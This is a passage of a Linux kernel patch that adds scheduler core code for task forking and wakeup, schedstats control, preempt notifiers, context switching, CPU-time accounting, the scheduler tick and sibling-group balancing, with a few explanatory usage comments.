++	p->time_slice = rq->curr->time_slice;
++#ifdef CONFIG_SCHED_HRTICK
++	hrtick_start(rq, rq->curr->time_slice);
++#endif
++
++	if (p->time_slice < RESCHED_NS) {
++		p->time_slice = sched_timeslice_ns;
++		resched_curr(rq);
++	}
++	sched_task_fork(p, rq);
++	raw_spin_unlock(&rq->lock);
++
++	rseq_migrate(p);
++	/*
++	 * We're setting the CPU for the first time, we don't migrate,
++	 * so use __set_task_cpu().
++	 */
++	__set_task_cpu(p, smp_processor_id());
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++void sched_post_fork(struct task_struct *p)
++{
++}
++
++#ifdef CONFIG_SCHEDSTATS
++
++DEFINE_STATIC_KEY_FALSE(sched_schedstats);
++
++static void set_schedstats(bool enabled)
++{
++	if (enabled)
++		static_branch_enable(&sched_schedstats);
++	else
++		static_branch_disable(&sched_schedstats);
++}
++
++void force_schedstat_enabled(void)
++{
++	if (!schedstat_enabled()) {
++		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
++		static_branch_enable(&sched_schedstats);
++	}
++}
++
++static int __init setup_schedstats(char *str)
++{
++	int ret = 0;
++	if (!str)
++		goto out;
++
++	if (!strcmp(str, "enable")) {
++		set_schedstats(true);
++		ret = 1;
++	} else if (!strcmp(str, "disable")) {
++		set_schedstats(false);
++		ret = 1;
++	}
++out:
++	if (!ret)
++		pr_warn("Unable to parse schedstats=\n");
++
++	return ret;
++}
++__setup("schedstats=", setup_schedstats);
++
++#ifdef CONFIG_PROC_SYSCTL
++static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
++		size_t *lenp, loff_t *ppos)
++{
++	struct ctl_table t;
++	int err;
++	int state = static_branch_likely(&sched_schedstats);
++
++	if (write && !capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	t = *table;
++	t.data = &state;
++	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
++	if (err < 0)
++		return err;
++	if (write)
++		set_schedstats(state);
++	return err;
++}
++
++static struct ctl_table sched_core_sysctls[] = {
++	{
++		.procname       = "sched_schedstats",
++		.data           = NULL,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler   = sysctl_schedstats,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++static int __init sched_core_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sched_core_sysctls);
++	return 0;
++}
++late_initcall(sched_core_sysctl_init);
++#endif /* CONFIG_PROC_SYSCTL */
++#endif /* CONFIG_SCHEDSTATS */
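++
++/*
++ * Usage note (derived from the code above): schedstats can be enabled at
++ * boot with "schedstats=enable" on the kernel command line, or toggled at
++ * runtime via the sysctl registered above:
++ *
++ *   sysctl kernel.sched_schedstats=1
++ */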
++
++/*
++ * wake_up_new_task - wake up a newly created task for the first time.
++ *
++ * This function will do some initial scheduler statistics housekeeping
++ * that must be done for every newly created context, then puts the task
++ * on the runqueue and wakes it.
++ */
++void wake_up_new_task(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	rq = cpu_rq(select_task_rq(p));
++#ifdef CONFIG_SMP
++	rseq_migrate(p);
++	/*
++	 * Fork balancing, do it here and not earlier because:
++	 * - cpus_ptr can change in the fork path
++	 * - any previously selected CPU might disappear through hotplug
++	 *
++	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
++	 * as we're not fully set-up yet.
++	 */
++	__set_task_cpu(p, cpu_of(rq));
++#endif
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	activate_task(p, rq);
++	trace_sched_wakeup_new(p);
++	check_preempt_curr(rq);
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++
++static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
++
++void preempt_notifier_inc(void)
++{
++	static_branch_inc(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_inc);
++
++void preempt_notifier_dec(void)
++{
++	static_branch_dec(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_dec);
++
++/**
++ * preempt_notifier_register - tell me when current is being preempted & rescheduled
++ * @notifier: notifier struct to register
++ */
++void preempt_notifier_register(struct preempt_notifier *notifier)
++{
++	if (!static_branch_unlikely(&preempt_notifier_key))
++		WARN(1, "registering preempt_notifier while notifiers disabled\n");
++
++	hlist_add_head(&notifier->link, &current->preempt_notifiers);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_register);
++
++/**
++ * preempt_notifier_unregister - no longer interested in preemption notifications
++ * @notifier: notifier struct to unregister
++ *
++ * This is *not* safe to call from within a preemption notifier.
++ */
++void preempt_notifier_unregister(struct preempt_notifier *notifier)
++{
++	hlist_del(&notifier->link);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
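++
++/*
++ * Usage sketch (editor's illustration; my_ops and its callbacks are
++ * made-up names): supply struct preempt_ops callbacks and register a
++ * notifier for the current task:
++ *
++ *   static struct preempt_ops my_ops = {
++ *           .sched_in  = my_sched_in,   // current was scheduled back in
++ *           .sched_out = my_sched_out,  // current is being scheduled out
++ *   };
++ *   struct preempt_notifier notifier;
++ *
++ *   preempt_notifier_inc();
++ *   preempt_notifier_init(&notifier, &my_ops);
++ *   preempt_notifier_register(&notifier);
++ */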
++
++static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_in(notifier, raw_smp_processor_id());
++}
++
++static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_in_preempt_notifiers(curr);
++}
++
++static void
++__fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				   struct task_struct *next)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_out(notifier, next);
++}
++
++static __always_inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_out_preempt_notifiers(curr, next);
++}
++
++#else /* !CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++}
++
++static inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++}
++
++#endif /* CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void prepare_task(struct task_struct *next)
++{
++	/*
++	 * Claim the task as running, we do this before switching to it
++	 * such that any running task will have this set.
++	 *
++	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
++	 * its ordering comment.
++	 */
++	WRITE_ONCE(next->on_cpu, 1);
++}
++
++static inline void finish_task(struct task_struct *prev)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * This must be the very last reference to @prev from this CPU. After
++	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
++	 * must ensure this doesn't happen until the switch is completely
++	 * finished.
++	 *
++	 * In particular, the load of prev->state in finish_task_switch() must
++	 * happen before this.
++	 *
++	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
++	 */
++	smp_store_release(&prev->on_cpu, 0);
++#else
++	prev->on_cpu = 0;
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	void (*func)(struct rq *rq);
++	struct balance_callback *next;
++
++	lockdep_assert_held(&rq->lock);
++
++	while (head) {
++		func = (void (*)(struct rq *))head->func;
++		next = head->next;
++		head->next = NULL;
++		head = next;
++
++		func(rq);
++	}
++}
++
++static void balance_push(struct rq *rq);
++
++/*
++ * balance_push_callback is a right abuse of the callback interface and plays
++ * by significantly different rules.
++ *
++ * Where the normal balance_callback's purpose is to be run in the same context
++ * that queued it (only later, when it's safe to drop rq->lock again),
++ * balance_push_callback is specifically targeted at __schedule().
++ *
++ * This abuse is tolerated because it places all the unlikely/odd cases behind
++ * a single test, namely: rq->balance_callback == NULL.
++ */
++struct balance_callback balance_push_callback = {
++	.next = NULL,
++	.func = balance_push,
++};
++
++static inline struct balance_callback *
++__splice_balance_callbacks(struct rq *rq, bool split)
++{
++	struct balance_callback *head = rq->balance_callback;
++
++	if (likely(!head))
++		return NULL;
++
++	lockdep_assert_rq_held(rq);
++	/*
++	 * Must not take balance_push_callback off the list when
++	 * splice_balance_callbacks() and balance_callbacks() are not
++	 * in the same rq->lock section.
++	 *
++	 * In that case it would be possible for __schedule() to interleave
++	 * and observe the list empty.
++	 */
++	if (split && head == &balance_push_callback)
++		head = NULL;
++	else
++		rq->balance_callback = NULL;
++
++	return head;
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return __splice_balance_callbacks(rq, true);
++}
++
++static void __balance_callbacks(struct rq *rq)
++{
++	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	unsigned long flags;
++
++	if (unlikely(head)) {
++		raw_spin_lock_irqsave(&rq->lock, flags);
++		do_balance_callbacks(rq, head);
++		raw_spin_unlock_irqrestore(&rq->lock, flags);
++	}
++}
++
++#else
++
++static inline void __balance_callbacks(struct rq *rq)
++{
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return NULL;
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++}
++
++#endif
++
++static inline void
++prepare_lock_switch(struct rq *rq, struct task_struct *next)
++{
++	/*
++	 * Since the runqueue lock will be released by the next
++	 * task (which is an invalid locking op but in the case
++	 * of the scheduler it's an obvious special-case), we
++	 * do an early lockdep release here:
++	 */
++	spin_release(&rq->lock.dep_map, _THIS_IP_);
++#ifdef CONFIG_DEBUG_SPINLOCK
++	/* this is a valid case when another task releases the spinlock */
++	rq->lock.owner = next;
++#endif
++}
++
++static inline void finish_lock_switch(struct rq *rq)
++{
++	/*
++	 * If we are tracking spinlock dependencies then we have to
++	 * fix up the runqueue lock - which gets 'carried over' from
++	 * prev into current:
++	 */
++	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
++	__balance_callbacks(rq);
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++/*
++ * NOP if the arch has not defined these:
++ */
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++static inline void kmap_local_sched_out(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_out();
++#endif
++}
++
++static inline void kmap_local_sched_in(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_in();
++#endif
++}
++
++/**
++ * prepare_task_switch - prepare to switch tasks
++ * @rq: the runqueue preparing to switch
++ * @next: the task we are going to switch to.
++ *
++ * This is called with the rq lock held and interrupts off. It must
++ * be paired with a subsequent finish_task_switch after the context
++ * switch.
++ *
++ * prepare_task_switch sets up locking and calls architecture specific
++ * hooks.
++ */
++static inline void
++prepare_task_switch(struct rq *rq, struct task_struct *prev,
++		    struct task_struct *next)
++{
++	kcov_prepare_switch(prev);
++	sched_info_switch(rq, prev, next);
++	perf_event_task_sched_out(prev, next);
++	rseq_preempt(prev);
++	fire_sched_out_preempt_notifiers(prev, next);
++	kmap_local_sched_out();
++	prepare_task(next);
++	prepare_arch_switch(next);
++}
++
++/**
++ * finish_task_switch - clean up after a task-switch
++ * @rq: runqueue associated with task-switch
++ * @prev: the thread we just switched away from.
++ *
++ * finish_task_switch must be called after the context switch, paired
++ * with a prepare_task_switch call before the context switch.
++ * finish_task_switch will reconcile locking set up by prepare_task_switch,
++ * and do any other architecture-specific cleanup actions.
++ *
++ * Note that we may have delayed dropping an mm in context_switch(). If
++ * so, we finish that here outside of the runqueue lock.  (Doing it
++ * with the lock held can cause deadlocks; see schedule() for
++ * details.)
++ *
++ * The context switch has flipped the stack from under us and restored the
++ * local variables which were saved when this task called schedule() in the
++ * past. prev == current is still correct but we need to recalculate this_rq
++ * because prev may have moved to another CPU.
++ */
++static struct rq *finish_task_switch(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	struct rq *rq = this_rq();
++	struct mm_struct *mm = rq->prev_mm;
++	unsigned int prev_state;
++
++	/*
++	 * The previous task will have left us with a preempt_count of 2
++	 * because it left us after:
++	 *
++	 *	schedule()
++	 *	  preempt_disable();			// 1
++	 *	  __schedule()
++	 *	    raw_spin_lock_irq(&rq->lock)	// 2
++	 *
++	 * Also, see FORK_PREEMPT_COUNT.
++	 */
++	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
++		      "corrupted preempt_count: %s/%d/0x%x\n",
++		      current->comm, current->pid, preempt_count()))
++		preempt_count_set(FORK_PREEMPT_COUNT);
++
++	rq->prev_mm = NULL;
++
++	/*
++	 * A task struct has one reference for the use as "current".
++	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
++	 * schedule one last time. The schedule call will never return, and
++	 * the scheduled task must drop that reference.
++	 *
++	 * We must observe prev->state before clearing prev->on_cpu (in
++	 * finish_task), otherwise a concurrent wakeup can get prev
++	 * running on another CPU and we could race with its RUNNING -> DEAD
++	 * transition, resulting in a double drop.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	vtime_task_switch(prev);
++	perf_event_task_sched_in(prev, current);
++	finish_task(prev);
++	tick_nohz_task_switch();
++	finish_lock_switch(rq);
++	finish_arch_post_lock_switch();
++	kcov_finish_switch(current);
++	/*
++	 * kmap_local_sched_out() is invoked with rq::lock held and
++	 * interrupts disabled. There is no requirement for that, but the
++	 * sched out code does not have an interrupt enabled section.
++	 * Restoring the maps on sched in does not require interrupts being
++	 * disabled either.
++	 */
++	kmap_local_sched_in();
++
++	fire_sched_in_preempt_notifiers(current);
++	/*
++	 * When switching through a kernel thread, the loop in
++	 * membarrier_{private,global}_expedited() may have observed that
++	 * kernel thread and not issued an IPI. It is therefore possible to
++	 * schedule between user->kernel->user threads without passing through
++	 * switch_mm(). Membarrier requires a barrier after storing to
++	 * rq->curr, before returning to userspace, so provide them here:
++	 *
++	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
++	 *   provided by mmdrop(),
++	 * - a sync_core for SYNC_CORE.
++	 */
++	if (mm) {
++		membarrier_mm_sync_core_before_usermode(mm);
++		mmdrop_sched(mm);
++	}
++	if (unlikely(prev_state == TASK_DEAD)) {
++		/* Task is done with its stack. */
++		put_task_stack(prev);
++
++		put_task_struct_rcu_user(prev);
++	}
++
++	return rq;
++}
++
++/**
++ * schedule_tail - first thing a freshly forked thread must call.
++ * @prev: the thread we just switched away from.
++ */
++asmlinkage __visible void schedule_tail(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	/*
++	 * New tasks start with FORK_PREEMPT_COUNT, see there and
++	 * finish_task_switch() for details.
++	 *
++	 * finish_task_switch() will drop rq->lock() and lower preempt_count
++	 * and the preempt_enable() will end up enabling preemption (on
++	 * PREEMPT_COUNT kernels).
++	 */
++
++	finish_task_switch(prev);
++	preempt_enable();
++
++	if (current->set_child_tid)
++		put_user(task_pid_vnr(current), current->set_child_tid);
++
++	calculate_sigpending();
++}
++
++/*
++ * context_switch - switch to the new MM and the new thread's register state.
++ */
++static __always_inline struct rq *
++context_switch(struct rq *rq, struct task_struct *prev,
++	       struct task_struct *next)
++{
++	prepare_task_switch(rq, prev, next);
++
++	/*
++	 * For paravirt, this is coupled with an exit in switch_to to
++	 * combine the page table reload and the switch backend into
++	 * one hypercall.
++	 */
++	arch_start_context_switch(prev);
++
++	/*
++	 * kernel -> kernel   lazy + transfer active
++	 *   user -> kernel   lazy + mmgrab() active
++	 *
++	 * kernel ->   user   switch + mmdrop() active
++	 *   user ->   user   switch
++	 */
++	if (!next->mm) {                                // to kernel
++		enter_lazy_tlb(prev->active_mm, next);
++
++		next->active_mm = prev->active_mm;
++		if (prev->mm)                           // from user
++			mmgrab(prev->active_mm);
++		else
++			prev->active_mm = NULL;
++	} else {                                        // to user
++		membarrier_switch_mm(rq, prev->active_mm, next->mm);
++		/*
++		 * sys_membarrier() requires an smp_mb() between setting
++		 * rq->curr / membarrier_switch_mm() and returning to userspace.
++		 *
++		 * The below provides this either through switch_mm(), or in
++		 * case 'prev->active_mm == next->mm' through
++		 * finish_task_switch()'s mmdrop().
++		 */
++		switch_mm_irqs_off(prev->active_mm, next->mm, next);
++		lru_gen_use_mm(next->mm);
++
++		if (!prev->mm) {                        // from kernel
++			/* will mmdrop() in finish_task_switch(). */
++			rq->prev_mm = prev->active_mm;
++			prev->active_mm = NULL;
++		}
++	}
++
++	prepare_lock_switch(rq, next);
++
++	/* Here we just switch the register state and the stack. */
++	switch_to(prev, next, prev);
++	barrier();
++
++	return finish_task_switch(prev);
++}
++
++/*
++ * nr_running and nr_context_switches:
++ *
++ * externally visible scheduler statistics: current number of runnable
++ * threads, total number of context switches performed since bootup.
++ */
++unsigned int nr_running(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_online_cpu(i)
++		sum += cpu_rq(i)->nr_running;
++
++	return sum;
++}
++
++/*
++ * Check if only the current task is running on the CPU.
++ *
++ * Caution: this function does not check that the caller has disabled
++ * preemption, thus the result might have a time-of-check-to-time-of-use
++ * race.  The caller is responsible for using it correctly, for example:
++ *
++ * - from a non-preemptible section (of course)
++ *
++ * - from a thread that is bound to a single CPU
++ *
++ * - in a loop with very short iterations (e.g. a polling loop)
++ */
++bool single_task_running(void)
++{
++	return raw_rq()->nr_running == 1;
++}
++EXPORT_SYMBOL(single_task_running);
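++
++/*
++ * Usage sketch (editor's illustration): a short polling loop that backs
++ * off once another task becomes runnable on this CPU:
++ *
++ *   while (!done) {
++ *           if (!single_task_running())
++ *                   break;      // someone else wants this CPU
++ *           cpu_relax();
++ *   }
++ */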
++
++unsigned long long nr_context_switches(void)
++{
++	int i;
++	unsigned long long sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += cpu_rq(i)->nr_switches;
++
++	return sum;
++}
++
++/*
++ * Consumers of these two interfaces, like for example the cpuidle menu
++ * governor, are using nonsensical data: they prefer shallow idle state
++ * selection for a CPU that has IO-wait, even though the waiting task might
++ * not even end up running on that CPU when it does become runnable.
++ */
++
++unsigned int nr_iowait_cpu(int cpu)
++{
++	return atomic_read(&cpu_rq(cpu)->nr_iowait);
++}
++
++/*
++ * IO-wait accounting, and how it's mostly bollocks (on SMP).
++ *
++ * The idea behind IO-wait accounting is to account the idle time that we could
++ * have spent running if it were not for IO. That is, if we were to improve the
++ * storage performance, we'd have a proportional reduction in IO-wait time.
++ *
++ * This all works nicely on UP, where, when a task blocks on IO, we account
++ * idle time as IO-wait, because if the storage were faster, it could've been
++ * running and we'd not be idle.
++ *
++ * This has been extended to SMP, by doing the same for each CPU. This however
++ * is broken.
++ *
++ * Imagine for instance the case where two tasks block on one CPU, only the one
++ * CPU will have IO-wait accounted, while the other has regular idle. Even
++ * though, if the storage were faster, both could've run at the same time,
++ * utilising both CPUs.
++ *
++ * This means, that when looking globally, the current IO-wait accounting on
++ * SMP is a lower bound, by reason of under accounting.
++ *
++ * Worse, since the numbers are provided per CPU, they are sometimes
++ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
++ * associated with any one particular CPU; it can wake up on a different CPU
++ * than the one it blocked on. This means the per-CPU IO-wait number is
++ * meaningless.
++ *
++ * Task CPU affinities can make all that even more 'interesting'.
++ */
++
++unsigned int nr_iowait(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += nr_iowait_cpu(i);
++
++	return sum;
++}
++
++#ifdef CONFIG_SMP
++
++/*
++ * sched_exec - execve() is a valuable balancing opportunity, because at
++ * this point the task has the smallest effective memory and cache
++ * footprint.
++ */
++void sched_exec(void)
++{
++}
++
++#endif
++
++DEFINE_PER_CPU(struct kernel_stat, kstat);
++DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
++
++EXPORT_PER_CPU_SYMBOL(kstat);
++EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
++
++static inline void update_curr(struct rq *rq, struct task_struct *p)
++{
++	s64 ns = rq->clock_task - p->last_ran;
++
++	p->sched_time += ns;
++	cgroup_account_cputime(p, ns);
++	account_group_exec_runtime(p, ns);
++
++	p->time_slice -= ns;
++	p->last_ran = rq->clock_task;
++}
++
++/*
++ * Return accounted runtime for the task.
++ * Return separately the current task's pending runtime that has not been
++ * accounted yet.
++ */
++unsigned long long task_sched_runtime(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	u64 ns;
++
++#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
++	/*
++	 * 64-bit doesn't need locks to atomically read a 64-bit value.
++	 * So we have an optimization chance when the task's delta_exec is 0.
++	 * Reading ->on_cpu is racy, but this is ok.
++	 *
++	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
++	 * If we race with it entering CPU, unaccounted time is 0. This is
++	 * indistinguishable from the read occurring a few cycles earlier.
++	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
++	 * been accounted, so we're correct here as well.
++	 */
++	if (!p->on_cpu || !task_on_rq_queued(p))
++		return tsk_seruntime(p);
++#endif
++
++	rq = task_access_lock_irqsave(p, &lock, &flags);
++	/*
++	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
++	 * project cycles that may never be accounted to this
++	 * thread, breaking clock_gettime().
++	 */
++	if (p == rq->curr && task_on_rq_queued(p)) {
++		update_rq_clock(rq);
++		update_curr(rq, p);
++	}
++	ns = tsk_seruntime(p);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++	return ns;
++}
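++
++/*
++ * Usage note (editor's addition): this helper backs thread runtime
++ * queries such as clock_gettime(CLOCK_THREAD_CPUTIME_ID) via the
++ * posix-cpu-timers code, hence the care above not to project cycles
++ * that may never be accounted.
++ */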
++
++/* This manages tasks that have run out of timeslice during a scheduler_tick */
++static inline void scheduler_task_tick(struct rq *rq)
++{
++	struct task_struct *p = rq->curr;
++
++	if (is_idle_task(p))
++		return;
++
++	update_curr(rq, p);
++	cpufreq_update_util(rq, 0);
++
++	/*
++	 * Tasks that have less than RESCHED_NS of time slice left will be
++	 * rescheduled.
++	 */
++	if (p->time_slice >= RESCHED_NS)
++		return;
++	set_tsk_need_resched(p);
++	set_preempt_need_resched();
++}
++
++#ifdef CONFIG_SCHED_DEBUG
++static u64 cpu_resched_latency(struct rq *rq)
++{
++	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
++	u64 resched_latency, now = rq_clock(rq);
++	static bool warned_once;
++
++	if (sysctl_resched_latency_warn_once && warned_once)
++		return 0;
++
++	if (!need_resched() || !latency_warn_ms)
++		return 0;
++
++	if (system_state == SYSTEM_BOOTING)
++		return 0;
++
++	if (!rq->last_seen_need_resched_ns) {
++		rq->last_seen_need_resched_ns = now;
++		rq->ticks_without_resched = 0;
++		return 0;
++	}
++
++	rq->ticks_without_resched++;
++	resched_latency = now - rq->last_seen_need_resched_ns;
++	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
++		return 0;
++
++	warned_once = true;
++
++	return resched_latency;
++}
++
++static int __init setup_resched_latency_warn_ms(char *str)
++{
++	long val;
++
++	if ((kstrtol(str, 0, &val))) {
++		pr_warn("Unable to set resched_latency_warn_ms\n");
++		return 1;
++	}
++
++	sysctl_resched_latency_warn_ms = val;
++	return 1;
++}
++__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
++#else
++static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
++#endif /* CONFIG_SCHED_DEBUG */
++
++/*
++ * This function gets called by the timer code, with HZ frequency.
++ * We call it with interrupts disabled.
++ */
++void scheduler_tick(void)
++{
++	int cpu __maybe_unused = smp_processor_id();
++	struct rq *rq = cpu_rq(cpu);
++	u64 resched_latency;
++
++	arch_scale_freq_tick();
++	sched_clock_tick();
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	scheduler_task_tick(rq);
++	if (sched_feat(LATENCY_WARN))
++		resched_latency = cpu_resched_latency(rq);
++	calc_global_load_tick(rq);
++
++	rq->last_tick = rq->clock;
++	raw_spin_unlock(&rq->lock);
++
++	if (sched_feat(LATENCY_WARN) && resched_latency)
++		resched_latency_warn(cpu, resched_latency);
++
++	perf_event_task_tick();
++}
++
++#ifdef CONFIG_SCHED_SMT
++static inline int sg_balance_cpu_stop(void *data)
++{
++	struct rq *rq = this_rq();
++	struct task_struct *p = data;
++	cpumask_t tmp;
++	unsigned long flags;
++
++	local_irq_save(flags);
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++
++	rq->active_balance = 0;
++	/* _something_ may have changed the task, double check again */
++	if (task_on_rq_queued(p) && task_rq(p) == rq &&
++	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
++	    !is_migration_disabled(p)) {
++		int cpu = cpu_of(rq);
++		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
++		rq = move_queued_task(rq, p, dcpu);
++	}
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock(&p->pi_lock);
++
++	local_irq_restore(flags);
++
++	return 0;
++}
++
++/* sg_balance_trigger - trigger sibling group balance for @cpu */
++static inline int sg_balance_trigger(const int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	struct task_struct *curr;
++	int res;
++
++	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
++		return 0;
++	curr = rq->curr;
++	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&
++	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&
++	      !is_migration_disabled(curr) && (!rq->active_balance);
++
++	if (res)
++		rq->active_balance = 1;
++
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	if (res)
++		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
++				    &rq->active_balance_work);
++	return res;
++}
++
++/*
++ * sg_balance - sibling group balance check for run queue @rq
++ */
++static inline void sg_balance(struct rq *rq)
++{
++	cpumask_t chk;
++	int cpu = cpu_of(rq);
++
++	/* exit when cpu is offline */
++	if (unlikely(!rq->online))
++		return;
++
++	/*
++	 * Only a cpu in the sibling idle group will do the checking and then
++	 * find potential cpus which can migrate the currently running task
++	 */
++	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
++	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
++		int i;
++
++		for_each_cpu_wrap(i, &chk, cpu) {
++			if (cpumask_subset(cpu_smt_mask(i), &chk) &&
++			    sg_balance_trigger(i))
++				return;
++		}
++	}
++}
++#endif /* CONFIG_SCHED_SMT */
++
++#ifdef CONFIG_NO_HZ_FULL
++
++struct tick_work {
++	int			cpu;
++	atomic_t		state;
++	struct delayed_work	work;
++};
++/* Values for ->state, see diagram below. */
++#define TICK_SCHED_REMOTE_OFFLINE	0
++#define TICK_SCHED_REMOTE_OFFLINING	1
++#define TICK_SCHED_REMOTE_RUNNING	2
++
++/*
++ * State diagram for ->state:
++ *
++ *
++ *          TICK_SCHED_REMOTE_OFFLINE
++ *                    |   ^
++ *                    |   |
++ *                    |   | sched_tick_remote()
++ *                    |   |
++ *                    |   |
++ *                    +--TICK_SCHED_REMOTE_OFFLINING
++ *                    |   ^
++ *                    |   |
++ * sched_tick_start() |   | sched_tick_stop()
++ *                    |   |
++ *                    V   |
++ *          TICK_SCHED_REMOTE_RUNNING
++ *
++ *
++ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
++ * and sched_tick_start() are happy to leave the state in RUNNING.
++ */
++
++static struct tick_work __percpu *tick_work_cpu;
++
++static void sched_tick_remote(struct work_struct *work)
++{
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct tick_work *twork = container_of(dwork, struct tick_work, work);
++	int cpu = twork->cpu;
++	struct rq *rq = cpu_rq(cpu);
++	struct task_struct *curr;
++	unsigned long flags;
++	u64 delta;
++	int os;
++
++	/*
++	 * Handle the tick only if it appears the remote CPU is running in full
++	 * dynticks mode. The check is racy by nature, but missing a tick or
++	 * having one too much is no big deal because the scheduler tick updates
++	 * statistics and checks timeslices in a time-independent way, regardless
++	 * of when exactly it is running.
++	 */
++	if (!tick_nohz_tick_stopped_cpu(cpu))
++		goto out_requeue;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	curr = rq->curr;
++	if (cpu_is_offline(cpu))
++		goto out_unlock;
++
++	update_rq_clock(rq);
++	if (!is_idle_task(curr)) {
++		/*
++		 * Make sure the next tick runs within a reasonable
++		 * amount of time.
++		 */
++		delta = rq_clock_task(rq) - curr->last_ran;
++		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
++	}
++	scheduler_task_tick(rq);
++
++	calc_load_nohz_remote(rq);
++out_unlock:
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out_requeue:
++	/*
++	 * Run the remote tick once per second (1Hz). This arbitrary
++	 * frequency is large enough to avoid overload but short enough
